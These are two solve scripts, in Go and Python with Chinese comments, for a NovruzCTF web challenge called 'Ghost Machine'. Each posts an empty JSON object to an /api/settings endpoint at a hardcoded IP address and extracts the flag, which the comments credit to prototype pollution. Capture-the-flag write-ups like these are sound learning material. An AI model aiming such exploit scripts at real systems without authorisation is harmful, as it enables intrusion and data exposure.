File: CTF_Writeups/scripts_go/NovruzCTF_The_Ghost_inside_the_Machine.go
// =============================================================================
// 题目名称: Ghost Machine
// 题目类别: Web - 原型污染 (Prototype Pollution)
// 解题思路: /api/settings 接口存在原型污染漏洞，发送空 JSON 对象即可触发
//
//	flag 泄露
//
// 用法: go run NovruzCTF_The_Ghost_inside_the_Machine.go [目标地址]
//
//	示例: go run NovruzCTF_The_Ghost_inside_the_Machine.go http://95.111.234.103:3000
//
// =============================================================================
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"os"
	"regexp"
)

const defaultAPIURL = "http://95.111.234.103:3000"

func main() {
	base := defaultAPIURL
	if len(os.Args) > 1 {
		base = os.Args[1]
	}

	endpoint := base + "/api/settings"
	resp, err := http.Post(endpoint, "application/json", bytes.NewBufferString("{}"))
	if err != nil {
		fmt.Fprintf(os.Stderr, "[!] 请求失败: %v\n", err)
		os.Exit(1)
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	re := regexp.MustCompile(`novruzctf\{[^}]+\}`)
	m := re.Find(body)
	if m == nil {
		fmt.Fprintln(os.Stderr, "[!] 未找到 flag，响应内容:")
		fmt.Println(string(body))
		os.Exit(1)
	}
	fmt.Println(string(m))
}

File: scripts_python/NovruzCTF_The_Ghost_inside_the_Machine.py
#!/usr/bin/env python3
"""
题目名称: Ghost Machine
类别: Web (原型污染 / Prototype Pollution)
解题思路:
    1. /api/settings 接口接受 JSON POST 请求
    2. 通过发送空 JSON 对象触发原型污染，返回 flag
"""

import re
import sys

import requests

# 目标地址（可通过命令行参数覆盖）
TARGET_URL = "http://95.111.234.103:3000/api/settings"
# flag 正则匹配
FLAG_PATTERN = r"novruzctf\{[^}]+\}"


def exploit(url: str = TARGET_URL) -> str:
    """发送空 JSON 触发原型污染获取 flag"""
    resp = requests.post(url, json={}, timeout=10)
    match = re.search(FLAG_PATTERN, resp.text)
    return match.group(0) if match else f"未找到 flag，响应内容:\n{resp.text[:500]}"


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    try:
        result = exploit(url)
        print(result)
    except requests.RequestException as e:
        print(f"[!] 请求失败: {e}", file=sys.stderr)
        sys.exit(1)
